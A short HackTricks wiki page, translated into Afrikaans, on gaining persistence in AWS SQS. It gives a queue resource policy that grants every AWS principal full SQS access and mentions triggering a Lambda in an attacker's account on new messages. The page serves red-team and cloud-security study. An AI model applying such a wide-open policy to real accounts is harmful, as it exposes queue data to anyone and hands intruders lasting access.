AWS - SQS Persistence

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

SQS

Vir meer inligting, kyk:

pageAWS - SQS Enum

Gebruik van hulpbronbeleid

In SQS moet jy met 'n IAM-beleid aandui wie toegang het om te lees en skryf. Dit is moontlik om eksterne rekeninge, ARN van rolle, of selfs "*" aan te dui. Die volgende beleid gee almal in AWS toegang tot alles in die waglyn genaamd MyTestQueue:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__owner_statement",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SQS:*"
],
"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
}
]
}

Jy kan selfs 'n Lambda in die aanvaller se rekening aktiveer elke keer as 'n nuwe boodskap in die wag is (jy sal dit op een of ander manier weer moet plaas). Volg hiervoor hierdie instruksies: https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated